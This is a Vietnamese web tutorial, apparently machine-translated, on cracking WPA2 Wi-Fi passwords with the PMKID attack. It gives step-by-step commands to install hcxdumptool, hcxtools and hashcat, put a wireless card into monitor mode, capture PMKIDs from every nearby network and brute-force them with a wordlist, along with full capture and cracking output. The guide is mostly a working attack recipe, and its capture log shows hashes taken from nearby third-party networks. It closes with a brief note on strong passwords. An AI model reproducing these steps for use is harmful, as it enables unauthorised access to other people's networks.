Hack mật khẩu wifi bằng cách sử dụng PMKID Hashcat

Việc bẻ khóa mật khẩu cho các mạng WPA2 gần như giống nhau trong nhiều năm, nhưng một cuộc tấn công mới hơn yêu cầu ít tương tác và thông tin hơn so với các kỹ thuật trước đây và có thêm lợi thế là có thể nhắm mục tiêu các điểm truy cập mà không có ai kết nối. Cuộc tấn công mới nhất chống lại PMKID sử dụng Hashcat để bẻ khóa mật khẩu WPA và cho phép tin tặc tìm thấy các mạng có mật khẩu yếu dễ dàng hơn.

Video Hack mật khẩu wifi bằng cách sử dụng PMKID Hashcat

Cách cũ để bẻ khóa mật khẩu WPA2

Cách bẻ khóa WPA2 cũ đã xuất hiện khá lâu và liên quan đến việc ngắt kết nối ngay lập tức thiết bị được kết nối khỏi điểm truy cập mà chúng tôi muốn thử bẻ khóa. Điều đó có hai mặt trái, điều này rất cần thiết cho các hacker Wi-Fi.

Cách Hack Wifi 2021 Ok 100% [Bẻ Khóa Pass Mật Khẩu Wifi]

Nhược điểm đầu tiên là yêu cầu ai đó được kết nối với mạng để tấn công nó. Mật khẩu mạng có thể yếu và rất dễ bị phá vỡ, nhưng nếu không có thiết bị được kết nối để khởi động trong thời gian ngắn, sẽ không có cơ hội để bắt được một cái bắt tay, do đó không có cơ hội để thử bẻ khóa nó.

Nhược điểm thứ hai của chiến thuật này là nó ồn ào và gây rắc rối về mặt pháp lý ở chỗ nó buộc bạn phải gửi các gói cố tình ngắt kết nối một người dùng được ủy quyền cho một dịch vụ mà họ đang trả tiền để sử dụng. Loại can thiệp trái phép này về mặt kỹ thuật là một cuộc tấn công từ chối dịch vụ và nếu được duy trì, tương đương với việc gây nhiễu mạng. Nó có thể khiến bạn gặp rắc rối và có thể dễ dàng phát hiện được bằng một số hướng dẫn trước đây của chúng tôi.

Một phương pháp bẻ khóa mật khẩu mới

Thay vì dựa vào việc chặn liên lạc hai chiều giữa các thiết bị Wi-Fi để thử bẻ khóa mật khẩu, kẻ tấn công có thể liên lạc trực tiếp với một điểm truy cập dễ bị tấn công bằng phương pháp mới. Vào ngày 4 tháng 8 năm 2018, một bài đăng trên diễn đàn Hashcat đã trình bày chi tiết một kỹ thuật mới tận dụng một cuộc tấn công chống lại RSN IE (Yếu tố thông tin mạng bảo mật mạnh mẽ) của một khung EAPOL duy nhất để thu thập thông tin cần thiết nhằm thực hiện một cuộc tấn công bạo lực.

Tương tự như các cuộc tấn công trước đây chống lại WPA, kẻ tấn công phải ở gần mạng mà chúng muốn tấn công. Mục tiêu sẽ là sử dụng bộ Kali-compatible mạng không dây tương thích với Kali để nắm bắt thông tin cần thiết từ mạng để thử cưỡng bức mật khẩu. Thay vì sử dụng Aireplay-ng hoặc Aircrack-ng, chúng tôi sẽ sử dụng một công cụ tấn công không dây mới để thực hiện việc này được gọi là hcxtools .

Sử dụng Hcxtools & Hashcat

Hcxdumptool và hcxpcaptool là các công cụ được viết để kiểm tra khả năng thâm nhập và kiểm tra Wi-Fi, đồng thời chúng cho phép chúng tôi tương tác với các mạng Wi-Fi lân cận để nắm bắt các lần bắt tay WPA và mã băm PMKID. Nó hoạt động tương tự như Besside-ng ở chỗ nó yêu cầu các đối số tối thiểu để bắt đầu một cuộc tấn công từ dòng lệnh, có thể chạy chống lại các mục tiêu cụ thể hoặc mục tiêu thuận tiện và có thể được thực thi nhanh chóng qua SSH trên Raspberry Pi hoặc thiết bị khác mà không cần màn.

Khi PMKID được chụp, bước tiếp theo là tải băm vào Hashcat và cố gắng bẻ khóa mật khẩu. Đây là điểm hcxtools khác với Besside-ng, ở chỗ cần có một bước chuyển đổi để chuẩn bị tệp cho Hashcat. Chúng tôi sẽ sử dụng hcxpcaptool để chuyển đổi tệp PCAPNG của chúng tôi thành một tệp mà Hashcat có thể hoạt động, chỉ còn bước chọn một danh sách mật khẩu mạnh mẽ cho các nỗ lực cưỡng bức vũ phu của bạn.

Điều đáng nói là không phải mạng nào cũng dễ bị tấn công này. Bởi vì đây là trường tùy chọn được thêm vào bởi một số nhà sản xuất, bạn không nên mong đợi sự thành công phổ biến với kỹ thuật này. Việc bạn có thể lấy được PMKID hay không phụ thuộc vào việc nhà sản xuất điểm truy cập có ưu ái cho bạn bao gồm một phần tử bao gồm nó hay không và liệu bạn có thể bẻ khóa PMKID đã chụp hay không phụ thuộc vào việc liệu mật khẩu cơ bản có trong danh sách mật khẩu brute-force của bạn hay không . Nếu một trong hai điều kiện không được đáp ứng, cuộc tấn công này sẽ thất bại.

Xem mấy anh tây làm : https://vimeo.com/388611462

Những gì bạn cần

Để thử cuộc tấn công này, bạn cần phải chạy Kali Linux và có quyền truy cập vào bộ Kali-compatible mạng không dây hỗ trợ chế độ giám sát và chèn gói. Chúng tôi có một số hướng dẫn về cách chọn bộ Kali-compatible mạng không dây tương thích bên dưới.

Ngoài bộ Kali-compatible mạng tương thích với Kali , hãy đảm bảo rằng bạn đã cập nhật và nâng cấp đầy đủ hệ thống của mình. Nếu bạn không làm như vậy, một số gói có thể đã cũ và gây ra sự cố khi chụp.

Bước 1Cài đặt Hxctools & Hashcat

Đầu tiên, chúng tôi sẽ cài đặt các công cụ chúng tôi cần. Để tải chúng xuống, hãy nhập thông tin sau vào cửa sổ dòng lệnh.

~# git clone https://github.com/ZerBea/hcxdumptool.git

Cloning into 'hcxdumptool'...
remote: Enumerating objects: 133, done.
remote: Counting objects: 100% (133/133), done.
remote: Compressing objects: 100% (97/97), done.
remote: Total 2127 (delta 82), reused 76 (delta 36), pack-reused 1994
Receiving objects: 100% (2127/2127), 759.53 KiB | 1.79 MiB/s, done.
Resolving deltas: 100% (1434/1434), done.

Sau đó, thay đổi vào thư mục và kết thúc cài đặt với make và sau đó thực hiện cài đặt .

~# cd hcxdumptool
~/hcxdumptool# make

cc -O3 -Wall -Wextra -std=gnu99  -o hcxpioff hcxpioff.c
cc -O3 -Wall -Wextra -std=gnu99  -o hcxdumptool hcxdumptool.c  -lcrypto

~/hcxdumptool# make install

cc -O3 -Wall -Wextra -std=gnu99  -o hcxpioff hcxpioff.c
cc -O3 -Wall -Wextra -std=gnu99  -o hcxdumptool hcxdumptool.c  -lcrypto
install -m 0755 -D hcxpioff /usr/local/bin/hcxpioff
install -m 0755 -D hcxdumptool /usr/local/bin/hcxdumptool
rm -f hcxpioff
rm -f hcxdumptool
rm -f *.o *~

Khi cài đặt xong, chúng ta sẽ chuyển sang cài đặt hxctools. Để làm như vậy, hãy mở một cửa sổ đầu cuối mới hoặc rời khỏi thư mục / hexdumptool, sau đó cài đặt hxctools.

~/hcxdumptool#cd
~# git clone https://github.com/ZerBea/hcxtools.git

Cloning into 'hcxtools'...
remote: Enumerating objects: 120, done.
remote: Counting objects: 100% (120/120), done.
remote: Compressing objects: 100% (82/82), done.
remote: Total 6196 (delta 77), reused 79 (delta 38), pack-reused 6076
Receiving objects: 100% (6196/6196), 1.89 MiB | 5.02 MiB/s, done.
Resolving deltas: 100% (4320/4320), done.

Tiếp theo, thay đổi thư mục của nó và chạy make và thực hiện cài đặt như trước. Nếu bạn gặp lỗi, hãy thử gõ sudo trước lệnh.

~# cd hcxtools
~/hcxtools# make

mkdir -p .deps
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/hcxpcapngtool.d -o hcxpcapngtool hcxpcapngtool.c -lz -lcrypto
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/hcxhashtool.d -o hcxhashtool hcxhashtool.c -lcrypto -lcurl
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/hcxpsktool.d -o hcxpsktool hcxpsktool.c -lcrypto
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/hcxwltool.d -o hcxwltool hcxwltool.c
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/wlancap2wpasec.d -o wlancap2wpasec wlancap2wpasec.c -lcurl
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/whoismac.d -o whoismac whoismac.c -lcurl
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/hcxpmkidtool.d -o hcxpmkidtool hcxpmkidtool.c -lcrypto -lpthread
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/wlanhcx2john.d -o wlanhcx2john wlanhcx2john.c
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/hcxpcaptool.d -o hcxpcaptool hcxpcaptool.c -lz -lcrypto
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/hcxhashcattool.d -o hcxhashcattool hcxhashcattool.c -lcrypto -lpthread
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/hcxmactool.d -o hcxmactool hcxmactool.c
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/hcxessidtool.d -o hcxessidtool hcxessidtool.c
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/hcxhash2cap.d -o hcxhash2cap hcxhash2cap.c
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/wlanhc2hcx.d -o wlanhc2hcx wlanhc2hcx.c
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/wlanwkp2hcx.d -o wlanwkp2hcx wlanwkp2hcx.c
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/wlanhcxinfo.d -o wlanhcxinfo wlanhcxinfo.c
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/wlanhcx2ssid.d -o wlanhcx2ssid wlanhcx2ssid.c
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/wlanhcxcat.d -o wlanhcxcat wlanhcxcat.c -lcrypto
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/wlanpmk2hcx.d -o wlanpmk2hcx wlanpmk2hcx.c -lcrypto
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/wlanjohn2hcx.d -o wlanjohn2hcx wlanjohn2hcx.c
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/wlancow2hcxpmk.d -o wlancow2hcxpmk wlancow2hcxpmk.c

~/hcxtools# make install

install -m 0755 -D hcxpcapngtool /usr/local/bin/hcxpcapngtool
install -m 0755 -D hcxhashtool /usr/local/bin/hcxhashtool
install -m 0755 -D hcxpsktool /usr/local/bin/hcxpsktool
install -m 0755 -D hcxwltool /usr/local/bin/hcxwltool
install -m 0755 -D wlancap2wpasec /usr/local/bin/wlancap2wpasec
install -m 0755 -D whoismac /usr/local/bin/whoismac
install -m 0755 -D hcxpmkidtool /usr/local/bin/hcxpmkidtool
install -m 0755 -D wlanhcx2john /usr/local/bin/wlanhcx2john
install -m 0755 -D hcxpcaptool /usr/local/bin/hcxpcaptool
install -m 0755 -D hcxhashcattool /usr/local/bin/hcxhashcattool
install -m 0755 -D hcxmactool /usr/local/bin/hcxmactool
install -m 0755 -D hcxessidtool /usr/local/bin/hcxessidtool
install -m 0755 -D hcxhash2cap /usr/local/bin/hcxhash2cap
install -m 0755 -D wlanhc2hcx /usr/local/bin/wlanhc2hcx
install -m 0755 -D wlanwkp2hcx /usr/local/bin/wlanwkp2hcx
install -m 0755 -D wlanhcxinfo /usr/local/bin/wlanhcxinfo
install -m 0755 -D wlanhcx2ssid /usr/local/bin/wlanhcx2ssid
install -m 0755 -D wlanhcxcat /usr/local/bin/wlanhcxcat
install -m 0755 -D wlanpmk2hcx /usr/local/bin/wlanpmk2hcx
install -m 0755 -D wlanjohn2hcx /usr/local/bin/wlanjohn2hcx
install -m 0755 -D wlancow2hcxpmk /usr/local/bin/wlancow2hcxpmk

Cuối cùng, chúng tôi sẽ cần cài đặt Hashcat, điều này sẽ dễ dàng, vì nó được bao gồm trong kho Kali Linux theo mặc định. Chỉ cần nhập thông tin sau để cài đặt phiên bản mới nhất của Hashcat.

~/hcxtools# cd
~# apt install hashcat

Reading package lists... Done
Building dependency tree
Reading state information... Done
hashcat is already the newest version (5.1.0+ds1-1).
The following packages were automatically installed and are no longer required:
  libdouble-conversion1 liblinear3
Use 'apt autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 1863 not upgraded.

Sau khi hoàn tất, chúng ta có thể chuyển sang thiết lập bộ Kali-compatible mạng không dây.

Bước 2 Chuẩn bị bộ Kali-compatible mạng không dây

Sau khi cắm bộ Kali-compatible mạng không dây tương thích với Kali, bạn có thể tìm tên bằng cách nhập ifconfig hoặc ip a . Thông thường, nó sẽ được đặt tên là wlan0. Bước đầu tiên sẽ là đặt thẻ vào chế độ màn hình không dây, cho phép chúng tôi nghe lưu lượng truy cập Wi-Fi trong khu vực ngay lập tức.

Để thực hiện việc này, hãy nhập lệnh sau vào cửa sổ đầu cuối, thay thế tên bộ Kali-compatible mạng không dây của bạn cho wlan0.

~# airmon-ng start wlan0

Found 3 processes that could cause trouble
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode

 PID Name
 555 NetworkManager
 611 wpa_supplicant
6636 dhclient

PHY     Interface   Driver      Chipset

phy0    wlan0       ath9k       Qualcomm Atheros QCA9565 / AR9565 Wireless Network Adapter (rev 01)

                (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
                (mac80211 station mode vif disabled for [phy0]wlan0)
phy1    wlan1       ath9k_htc   Atheros Communications, Inc. AR9271 802.11n

Bây giờ, bộ Kali-compatible mạng không dây của bạn phải có tên như “wlan0mon” và ở chế độ giám sát. Bạn có thể xác nhận điều này bằng cách chạy lại ifconfig .

Bước 3 Sử dụng Hxcdump để chụp PMKID từ Mạng cục bộ

Bây giờ chúng tôi đã sẵn sàng nắm bắt PMKID của các thiết bị mà chúng tôi muốn thử tấn công. Với bộ Kali-compatible mạng không dây của chúng tôi ở chế độ giám sát là “wlan1mon”, chúng tôi sẽ thực hiện lệnh sau để bắt đầu cuộc tấn công.

~# hcxdumptool -i wlan1mon -o galleria.pcapng --enable__status=1

Chia nhỏ điều này, -i cho chương trình biết chúng ta đang sử dụng giao diện nào, trong trường hợp này là wlan1mon. Tên tệp mà chúng tôi sẽ lưu kết quả để có thể được chỉ định bằng đối số cờ -o . Kênh chúng ta muốn quét có thể được chỉ báo bằng cờ -c, theo sau là số kênh cần quét.

Trong lệnh của chúng tôi ở trên, chúng tôi đang sử dụng wlan1mon để lưu các PMKID đã chụp vào một tệp có tên “galleria.pcapng”. Mặc dù bạn có thể chỉ định một giá trị trạng thái khác , nhưng tôi đã không thu được thành công với bất kỳ giá trị nào ngoại trừ 1 .

warning: NetworkManager is running with pid 555
warning: wpa_supplicant is running with pid 611
warning: wlan1mon is probably a monitor interface

start capturing (stop with ctrl+c)
INTERFACE:...............: wlan1mon
FILTERLIST...............: 0 entries
MAC CLIENT...............: fcc233ca8bc5
MAC ACCESS POINT.........: 10ae604b9e82 (incremented on every new client)
EAPOL TIMEOUT............: 150000
REPLAYCOUNT..............: 62439
ANONCE...................: d8dd2206c82ad030e843a39e8f99281e215492dbef56f693cd882d4dfcde9956

[22:17:32 - 001] c8b5adb615ea -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:32 - 001] c8b5adb615e9 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:33 - 001] 2c95694f3ca0 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:33 - 001] 2c95694f3ca0 -> b4b686abc81a [FOUND PMKID]
[22:17:48 - 011] 14edbb9938ea -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:48 - 011] 88964e3a8ea0 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:49 - 011] dc7fa425888a -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:51 - 011] 88964e801fa0 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:57 - 001] 9822efc6fdff -> ba634d3eb80d [EAPOL 4/4 - M4 RETRY ATTACK]
[22:17:57 - 001] 9822efc6fdff -> ba634d3eb80d [FOUND HANDSHAKE AP-LESS, EAPOL TIMEOUT 6696]
[22:18:04 - 011] 803773defd01 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:19:21 - 011] 14edbb9ba0e6 -> 803773defd01 [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT 15247]
[22:19:34 - 006] 0618d629465b -> 58fb8433aac2 [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT 2832]
[22:19:42 - 005] e0220203294e -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:19:57 - 011] 14edbb9ba0e6 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:20:02 - 008] 14edbbd29326 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:20:04 - 008] 1c872c707c60 -> 78e7d17791e7 [FOUND PMKID]
[22:20:11 - 009] e0220453a576 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:20:27 - 001] ace2d32602da -> c8665d5dd654 [FOUND HANDSHAKE AP-LESS, EAPOL TIMEOUT 5202]
INFO: cha=2, rx=32752, rx(dropped)=2801, tx=2205, powned=18, err=0

Khi đã tập hợp đủ, bạn có thể dừng chương trình bằng cách gõ Control-C để kết thúc cuộc tấn công. Điều này sẽ tạo ra một tệp PCAPNG chứa thông tin mà chúng tôi cần để cố gắng thực hiện một cuộc tấn công brute-cưỡng bức, nhưng chúng tôi sẽ cần chuyển đổi nó thành một định dạng mà Hashcat có thể hiểu được.

Bước 4Sử dụng Hxcpcaptool để chuyển đổi Dump cho Hashcat

Để chuyển đổi tệp PCAPNG của chúng tôi, chúng tôi sẽ sử dụng hcxpcaptool với một số đối số được chỉ định. Trong cùng thư mục mà tệp .PCAPNG của bạn được lưu, hãy chạy lệnh sau trong cửa sổ dòng lệnh.

~# hcxpcaptool -E essidlist -I identitylist -U usernamelist -z galleriaHC.16800 galleria.pcapng

Lệnh này yêu cầu hxcpcaptool sử dụng thông tin có trong tệp để giúp Hashcat hiểu nó với các cờ -E , -I và -U . Các -Z cờ được sử dụng cho tên của tập tin vừa được chuyển đổi cho Hashcat để sử dụng, và phần cuối cùng của lệnh là file PCAPNG chúng tôi muốn chuyển đổi.

Chạy lệnh sẽ cho chúng ta thấy những điều sau.

summary:
--------
file name....................: galleria.pcapng
file type....................: pcapng 1.0
file hardware information....: x86_64
file os information..........: Linux 4.18.0-kali2-amd64
file application information.: hcxdumptool 4.2.1
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: little endian
read errors..................: flawless
packets inside...............: 1089
skipped packets..............: 0
packets with GPS data........: 0
packets with FCS.............: 732
beacons (with ESSID inside)..: 49
probe requests...............: 26
probe responses..............: 40
association requests.........: 103
association responses........: 204
reassociation requests.......: 2
reassocaition responses......: 7
authentications (OPEN SYSTEM): 346
authentications (BROADCOM)...: 114
authentications (APPLE)......: 1
EAPOL packets................: 304
EAPOL PMKIDs.................: 21
best handshakes..............: 4 (ap-less: 1)

21 PMKID(s) written to galleriahC.16800

Ở đây, chúng ta có thể thấy rằng chúng ta đã thu thập được 21 PMKID trong một khoảng thời gian ngắn. Bây giờ chúng ta có thể sử dụng tệp “galleriaHC.16800” trong Hashcat để thử bẻ khóa mật khẩu mạng.

Bước 5Chọn một danh sách mật khẩu và lực lượng vũ phu với Hashcat

Để bắt đầu tấn công các hàm băm mà chúng tôi đã nắm bắt, chúng tôi cần chọn một danh sách mật khẩu tốt. Bạn có thể tìm thấy một số danh sách mật khẩu tốt để bắt đầu lại tại bộ sưu tập SecList . Khi bạn đã có danh sách mật khẩu, hãy đặt nó vào cùng thư mục với tệp .16800 mà bạn vừa chuyển đổi, rồi chạy lệnh sau trong cửa sổ dòng lệnh.

~# hashcat -m 16800 galleriaHC.16800 -a 0 --kernel-accel=1 -w 4 --force 'topwifipass.txt'

Trong lệnh này, chúng tôi đang khởi động Hashcat ở chế độ 16800 , chế độ này dùng để tấn công các giao thức mạng WPA-PMKID-PBKDF2. Tiếp theo, chúng tôi sẽ chỉ định tên của tệp mà chúng tôi muốn bẻ khóa, trong trường hợp này là “galleriaHC.16800.” Các -a cờ cho chúng ta biết những loại tấn công để sử dụng, trong trường hợp này, một “thẳng” tấn công, và sau đó là -w và –kernel-Accel = 1 cờ quy định cụ thể hồ sơ cá nhân thực hiện khối lượng công việc cao nhất. Nếu máy tính của bạn gặp sự cố về hiệu suất, bạn có thể giảm số trong đối số -w .

Tiếp theo, tùy chọn –force bỏ qua bất kỳ cảnh báo nào để tiếp tục tấn công và phần cuối cùng của lệnh chỉ định danh sách mật khẩu mà chúng tôi đang sử dụng để cố gắng cưỡng chế các PMKID trong tệp của chúng tôi, trong trường hợp này, được gọi là “topwifipass. txt. ”

hashcat (v4.2.1) starting...

OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-AMD A8-6410 APU with AMD Radeon R5 Graphics, 2553/2553 MB allocatable, 4MCU

Hashes: 21 digests; 21 unique digests, 20 unique salts

Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Slow-Hash-SIMD-LOOP

Minimum password length supported by kernel: 8
Maximum password length supported by kernel: 63

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

* Device #1: build_opts '-cl-std=CL1.1 -I OpenCL -I /usr/share/hashcat/OpenCL -D VENDOR ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=4 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3 -D DGST_ELEM=4 -D KERN_TYPE=16800 -D _unroll'
Dictionary cache hit:

* Filename..: topwifipass.txt
* Passwords.: 4801
* Bytes.....: 45277
* Keyspace..: 4801

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =>

Tùy thuộc vào tốc độ phần cứng và kích thước danh sách mật khẩu của bạn, quá trình này có thể mất khá nhiều thời gian để hoàn thành. Để xem trạng thái bất kỳ lúc nào, bạn có thể nhấn phím S để cập nhật.

Bước 6Diễn giải kết quả

Khi Hashcat hoạt động, bạn sẽ có thể kiểm tra trong quá trình xử lý để xem có khóa nào đã được khôi phục hay không.

Hash.Type........: WPA-PMKID-PBKDF2
Hash.Target......: galleriaHC.16800
Time.Started.....: Sun Oct 28 22:32:57 2018 (7 mins, 50 secs)
Time.Estimated...: Sun Oct 28 22:57:50 2018 (17 mins, 3 secs)
Guess.Base.......: File (topwifipass.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....:      64 H/s (15.43ms) @ Accel:1 Loops:1024 Thr:1 Vec:4
Recovered........: 0/21 (0.00%) Digests, 0/20 (0.00%) Salts
Progress.........: 30180/96020 (31.43%)
Rejected.........: 0/30180 (0.00%)
Restore.Point....: 1508/4801 (31.41%)
Candidates.#1....: peter123 -> moneyman
HWon.Dev.#1......: N/A

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =>

Session..........: hashcat
Status...........: Running
Hash.Type........: WPA-PMKID-PBKDF2
Hash.Target......: galleriaHC.16800
Time.Started.....: Sun Oct 28 22:32:57 2018 (19 mins, 56 secs)
Time.Estimated...: Sun Oct 28 22:57:54 2018 (5 mins, 3 secs)
Guess.Base.......: File (topwifipass.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....:      64 H/s (15.24ms) @ Accel:1 Loops:1024 Thr:1 Vec:4
Recovered........: 0/21 (0.00%) Digests, 0/20 (0.00%) Salts
Progress.........: 76736/96020 (79.92%)
Rejected.........: 0/76736 (0.00%)
Restore.Point....: 3836/4801 (79.90%)
Candidates.#1....: monopoli -> mercenary
HWon.Dev.#1......: N/A

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =>

Khi danh sách mật khẩu sắp kết thúc, Hashcat sẽ tự động điều chỉnh khối lượng công việc và cung cấp cho bạn báo cáo cuối cùng khi hoàn tất.

Approaching final keyspace - workload adjusted.

Session..........: hashcat
Status...........: Exhausted
Hash.Type........: WPA-PMKID-PBKDF2
Hash.Target......: hotspotcap.16800
Time.Started.....: Sun Oct 28 18:05:57 2018 (3 mins, 49 secs)
Time.Estimated...: Sun Oct 28 18:09:46 2018 (0 secs)
Guess.Base.......: File (topwifipass.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....:      42 H/s (15.56ms) @ Accel:1 Loops:1024 Thr:1 Vec:4
Recovered........: 0/2 (0.00%) Digests, 0/2 (0.00%) Salts
Progress.........: 9602/9602 (100.0%)
Rejected.........: 2/9602 (0.02%)
Restore.Point....: 4801/4801 (100.0%)
Candidates.#1....: 159159159 -> 00001111
HWon.Dev.#1......: N/A

Started: Sun Oct 28 18:05:56 2018
Stopped: Sun Oct 28 18:09:49 2018

Nếu bạn đã bẻ khóa được bất kỳ mật khẩu nào, bạn sẽ thấy chúng ở đây. Trong quá trình chạy thử nghiệm của chúng tôi, không có PMKID nào mà chúng tôi thu thập được chứa mật khẩu trong danh sách mật khẩu của chúng tôi, do đó chúng tôi không thể bẻ khóa bất kỳ hàm băm nào. Đây rất có thể là kết quả của bạn so với bất kỳ mạng nào có mật khẩu mạnh nhưng mong đợi để xem kết quả ở đây cho các mạng sử dụng mật khẩu yếu.

Cuộc tấn công PMKID Hashcat làm cho các cuộc tấn công Wi-Fi trở nên dễ dàng hơn

Mặc dù cuộc tấn công mới chống lại mật khẩu Wi-Fi giúp tin tặc dễ dàng thực hiện một cuộc tấn công vào mục tiêu, nhưng các phương pháp tương tự đã có hiệu quả chống lại các kiểu bẻ khóa WPA trước đây vẫn có hiệu quả. Nếu mạng của bạn thậm chí không hỗ trợ phần tử bảo mật mạnh mẽ có chứa PMKID, thì cuộc tấn công này không có cơ hội thành công. Bạn có thể kiểm tra mạng của mình bằng hcxtools để xem nó có dễ bị tấn công hay không.

Ngay cả khi mạng của bạn dễ bị tấn công, mật khẩu mạnh vẫn là cách bảo vệ tốt nhất chống lại kẻ tấn công giành quyền truy cập vào mạng Wi-Fi của bạn bằng cách sử dụng cuộc tấn công bẻ khóa mật khẩu này hoặc khác.

Vì các cuộc tấn công này dựa vào việc đoán mật khẩu mà mạng Wi-Fi đang sử dụng, nên có hai nguồn phỏng đoán phổ biến; Đầu tiên là người dùng chọn mật khẩu mặc định hoặc mật khẩu quá xấu , chẳng hạn như “12345678” hoặc “password”. Những thứ này sẽ dễ bị nứt. Nguồn thứ hai của các phỏng đoán mật khẩu đến từ các vi phạm dữ liệu làm lộ hàng triệu mật khẩu thực của người dùng . Bởi vì nhiều người dùng sẽ sử dụng lại mật khẩu giữa các loại tài khoản khác nhau, các danh sách này có xu hướng rất hiệu quả trong việc bẻ khóa mạng Wi-Fi.

Back to top button